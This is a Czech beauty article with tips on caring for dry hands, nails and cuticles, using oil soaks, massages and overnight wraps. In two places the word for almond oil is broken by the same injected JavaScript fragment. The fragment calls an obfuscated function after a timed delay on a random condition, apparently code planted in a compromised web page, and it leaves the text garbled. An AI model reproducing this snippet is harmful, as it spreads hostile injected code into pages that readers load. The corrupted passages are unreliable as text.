Péče o tělo,  Rady a tipy

Jak mít krásné a zdravé ruce

Přestože naše ruce trpí nejvíce v zimních měsících,  naši péči si zaslouží po celý rok. Jak mrazy, tak například práce na zahrádce nebo mytí nádobí má za následek popraskané a suché ruce, třepící se nehty a záděrky. Přitom většina z nás se při prvním setkání s někým novým dívá jako první právě na jeho ruce. Upravené a čisté ruce jsou vždy dobrou vizitkou. Přinášíme vám několik tipů, jak pomoci přírodní cestou vašim rukám a ještě si díky tomu dopřát příjemnou relaxaci.

Abychom předešli nadměrnému vysoušení rukou, které s sebou přináší i nepříjemné pocity pnutí a svědění, doporučuje se mazat si ruce pravidelně, v zimě ideálně po každém umytí. Někomu je pocit hutného, mastného krému přes den nepříjemný, proto volte radši lehčí krémy, které se ihned vstřebají. Na noc je naopak vhodný krém mastnější, s hutnější konzistencí, který přes noc ruce krásně zregeneruje. Mimo to můžeme našim rukám dopřát přímo lázeňskou péči za pomoci výživných olejů.

 

Olejová lázeň pro ruce i nehty

Olejovou lázeň si doma připravíme velmi jednoduše. Stačí si ve skleněné misce nahřát trochu olivového oleje a ponořit do něj prsty. Můžete také lehce vmasírovat olej do nehtů, které díky tomu budou vyživené a na pohled o poznání lesklejší. Ideální je dopřát si takovou lázeň během relaxace, například u sledování vašeho oblíbeného pořadu.

Tip: Máte-li ruce hodně vysušené, zabalte je po této lázni do igelitových pytlíků nebo rukavic a přes ně navlékněte teplé rukavice. Stačí 10-15 minut

 

Masáž pro nehtovou kůžičku

Nehtová kůžička bývá často suchá, tvrdá a tvoří se na ní bolestivé a nevzhledné záděrky. Přitom vzhled a zdraví vašich nehtů do určité míry závisí právě na stavu nehtové kůžičky. Věnujte jí tedy alespoň občas chvilku a dopřejte si příjemnou masáž. Postačí vám pár kapek oleje, skvělý je na to například mandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andlový, které postupně vmasírujete do nehtových kůžiček. Poté nechte olej vsáknout.

Výživný zábal na noc

Přes noc vám ruce krásně zregenerují, pokud si je namažete vaším oblíbeným olejem nebo výživným krémem a následně si navléknete bavlněné rukavice. Zakoupíte je skoro v každé drogerii, nebo můžete použít nějaké vysloužilé. Nejvhodnější je krém s bambuckým máslem. Co se týče olejů, na našem trhu je jich opravdu mnoho, osvědčený je například olej arganový, jojobový, konopný, mandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andlový, lněný, makadamiový, olivový nebo ricinový.

Tip: Pokud si ráno plánujete mýt vlasy, můžete trochu oleje vetřít i do jejich konečků.

 

Květa Čermáková

Koupit Meduňku